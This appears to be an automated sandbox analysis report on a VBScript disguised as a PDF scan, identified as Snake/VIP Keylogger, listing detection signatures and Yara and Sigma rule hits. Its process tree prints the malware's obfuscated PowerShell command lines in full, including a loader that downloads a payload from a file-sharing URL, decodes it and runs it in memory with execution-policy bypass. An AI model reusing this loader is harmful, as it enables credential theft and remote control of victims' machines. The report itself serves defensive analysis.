Edit tour
Windows
Analysis Report
Scan12112024,pdf.vbs
Overview
General Information
| Sample name: | Scan12112024,pdf.vbs |
| Analysis ID: | 1554182 |
| MD5: | 3f17db10010a4ce43a4f0429179c9f55 |
| SHA1: | 0a562aa4ba586163f1016b68e028a77bce000490 |
| SHA256: | 025945e88ff07b6cac99091ea9410351047fa352f29026d5751dc15b63ad1765 |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
Snake Keylogger, VIP Keylogger
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VBS Downloader Generic
Yara detected VIP Keylogger
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Potential malicious VBS script found (has network functionality)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6380 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Scan1 2112024,pd f.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - wscript.exe (PID: 2608 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user~1 \AppData\L ocal\Temp\ bJYfKeNSnh CTjDYSPw.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 1432 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnYlpOaW 1hZ2VVcmwg PSBSckhodH RwczovLzEw MTcuZmlsZW 1haWwuY29t L2FwaS9maW xlL2dldD9m aWxla2V5PT JBJysnYV9i V285UmV1NC crJzV0N0JV MWtWZ3NkOX BUOXBnU1Ns dlN0JysnR3 JuVElDZkZo bVRLajNMQz ZTUXRJY09j X1QzJysnNX cmcGtfdmlk PWZkNGY2MT RiYjIwOWM2 MmMxNzMwOT Q1MTc2YTA5 MDRmIFJySD tiWk53ZWJD bGllbnQgPS BOZXctT2Jq ZWN0IFN5c3 RlbS5OZXQu V2ViQ2xpZW 50O2JaTmlt YWdlQnl0ZX MgPSBiWk53 ZWJDbGllbn QuRG93bmxv YWREYXRhKG JaTmltYWdl VXJsKTtiWk 5pbWFnZVRl eHQgPScrJy BbU3lzdGVt LlRleHQuRW 5jb2Rpbmdd OjpVVEY4Lk dldFN0cmlu ZyhiWk5pbW FnZUJ5dGVz KTtiWk5zdG FydEZsYWcg PSBSckg8PE JBU0U2NF9T VEFSVD4+Un JIO2JaTmVu ZEZsYWcgPS BSckg8PEJB U0U2NF9FTk Q+PlJySDti Wk5zdGFydE luZGV4ID0g JysnYlpOaW 1hZ2VUZXh0 LkluZGV4T2 YoYlpOc3Rh cnRGbGFnKT tiWk5lbmRJ bmRleCA9IG JaTmltYWdl VGV4dC5Jbm QnKydleE9m KGJaTmVuZE ZsYScrJ2cp O2JaTnN0YX J0SW5kZXgg LWdlIDAgLW FuZCBiWk5l bmRJbmRleC AtZ3QgYlpO c3RhcicrJ3 RJbicrJ2Rl JysneDtiWk 5zdGFydElu ZGV4ICs9IG JaTnN0YXJ0 RmxhZy5MZW 5ndGg7YlpO YmFzZTY0TC crJ2VuZ3Ro ID0gYlpOZW 5kSW5kZXgg JysnLSBiWk 5zdGFyJysn dEluZGV4O2 JaTmJhc2U2 NENvbW1hbm QgPSBiWk5p bWFnJysnZV RleHQuU3Vi c3RyaScrJ2 5nKGJaTnN0 YXJ0SW5kZX gsIGJaTmJh c2U2NExlbm d0aCk7YlpO YmFzZTY0Ui crJ2V2ZXJz ZWQgPSAtam 9pbiAoYlpO YmFzZTY0Q2 9tbWFuZC5U b0NoYXJBcn JheSgpIFpB UiBGb3JFYW NoLU9iamVj dCB7IGJaTl 8gJysnfSlb LTEuLi0oYl pOYmFzZTY0 Q29tbWFuZC 5MZW5ndGgp XTtiWk5jb2 1tYW5kQnl0 ZXMgPSBbU3 lzdGVtLkNv bnZlcnRdOj pGcm9tQmFz ZTY0U3RyaW 5nKGJaTmJh c2U2JysnNF JldmVyc2Vk KTtiWk5sb2 FkZWRBc3Nl bWJseSA9IF tTeXN0ZW0u UmVmbGVjdG lvbi5Bc3Nl bWJseV06Ok xvYWQoYlpO Y29tJysnbW FuZEJ5dGVz KTtiWk52YW lNZXRob2Qg PSBbZG5saW IuSU8uSG9t ZV0uR2V0TW V0aG9kKFJy SFZBSVJySC k7YlpOdmFp TWV0aG9kLk ludm9rZShi Wk5udWxsLC BAKFJySHR4 dC5MU1NXUy 9rbG8vdWUu aHN1cHdzcm VsbCcrJ29y LnN1cC8vOn B0dGhSckgs IFJySGRlc2 F0aXZhZG9S ckgsIFJyJy snSGRlc2F0 aXZhZG9Sck gsIFJySGRl c2F0aXZhZG 9SckgsIFJy SGRlc2F0aX ZhZG8nKydS cicrJ0gsIF JySDFSckgs IFJySHN2Y2 hvc3RSckgs IFJySGRlc2 F0aXYnKydh ZG9SckgsIF JySGRlc2F0 JysnaXZhZG 9SckgsUnJI ZGVzYXRpJy sndmFkb1Jy SCxSckhkZX NhdGl2YWRv UnJILFJySG Rlc2F0aXZh ZG9SckgsUn JIMVJySCxS ckhkZXNhdG l2YWRvUnJI KSk7JyktQ1 JlcExBQ2Ug KFtjSEFyXT gyK1tjSEFy XTExNCtbY0 hBcl03Miks W2NIQXJdMz kgIC1yRVBs QUNFKFtjSE FyXTk4K1tj SEFyXTkwK1 tjSEFyXTc4 KSxbY0hBcl 0zNiAtQ1Jl cExBQ2UnWk FSJyxbY0hB cl0xMjQpIH wgLiAoICRw U2hvTWVbNF 0rJFBzaG9N RVszNF0rJ1 gnKQ==';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 1456 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3232 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('bZ NimageUrl = RrHhttps ://1017.fi lemail.com /api/file/ get?fileke y=2A'+'a_b Wo9Reu4'+' 5t7BU1kVgs d9pT9pgSSl vSt'+'GrnT ICfFhmTKj3 LC6SQtIcOc _T3'+'5w&p k_vid=fd4f 614bb209c6 2c17309451 76a0904f R rH;bZNwebC lient = Ne w-Object S ystem.Net. WebClient; bZNimageBy tes = bZNw ebClient.D ownloadDat a(bZNimage Url);bZNim ageText =' +' [System .Text.Enco ding]::UTF 8.GetStrin g(bZNimage Bytes);bZN startFlag = RrH<<BAS E64_START> >RrH;bZNen dFlag = Rr H<<BASE64_ END>>RrH;b ZNstartInd ex = '+'bZ NimageText .IndexOf(b ZNstartFla g);bZNendI ndex = bZN imageText. Ind'+'exOf (bZNendFla '+'g);bZNs tartIndex -ge 0 -and bZNendInd ex -gt bZN star'+'tIn '+'de'+'x; bZNstartIn dex += bZN startFlag. Length;bZN base64L'+' ength = bZ NendIndex '+'- bZNst ar'+'tInde x;bZNbase6 4Command = bZNimag'+ 'eText.Sub stri'+'ng( bZNstartIn dex, bZNba se64Length );bZNbase6 4R'+'evers ed = -join (bZNbase6 4Command.T oCharArray () ZAR For Each-Objec t { bZN_ ' +'})[-1..- (bZNbase64 Command.Le ngth)];bZN commandByt es = [Syst em.Convert ]::FromBas e64String( bZNbase6'+ '4Reversed );bZNloade dAssembly = [System. Reflection .Assembly] ::Load(bZN com'+'mand Bytes);bZN vaiMethod = [dnlib.I O.Home].Ge tMethod(Rr HVAIRrH);b ZNvaiMetho d.Invoke(b ZNnull, @( RrHtxt.LSS WS/klo/ue. hsupwsrell '+'or.sup/ /:ptthRrH, RrHdesati vadoRrH, R r'+'Hdesat ivadoRrH, RrHdesativ adoRrH, Rr Hdesativad o'+'Rr'+'H , RrH1RrH, RrHsvchos tRrH, RrHd esativ'+'a doRrH, RrH desat'+'iv adoRrH,RrH desati'+'v adoRrH,RrH desativado RrH,RrHdes ativadoRrH ,RrH1RrH,R rHdesativa doRrH));') -CRepLACe ([cHAr]82+ [cHAr]114+ [cHAr]72), [cHAr]39 - rEPlACE([c HAr]98+[cH Ar]90+[cHA r]78),[cHA r]36 -CRep LACe'ZAR', [cHAr]124) | . ( $pS hoMe[4]+$P shoME[34]+ 'X')" MD5: 04029E121A0CFA5991749937DD22A1D9) 
svchost.exe (PID: 7440 cmdline: "C:\Window s\SysWOW64 \svchost.e xe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| 404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_VBS_Downloader_Generic | Yara detected VBS Downloader Generic | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
| JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security | ||
| JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
| Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
| |
| Click to see the 29 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
| |
| MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
| |
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security | ||
| JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
| Click to see the 75 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||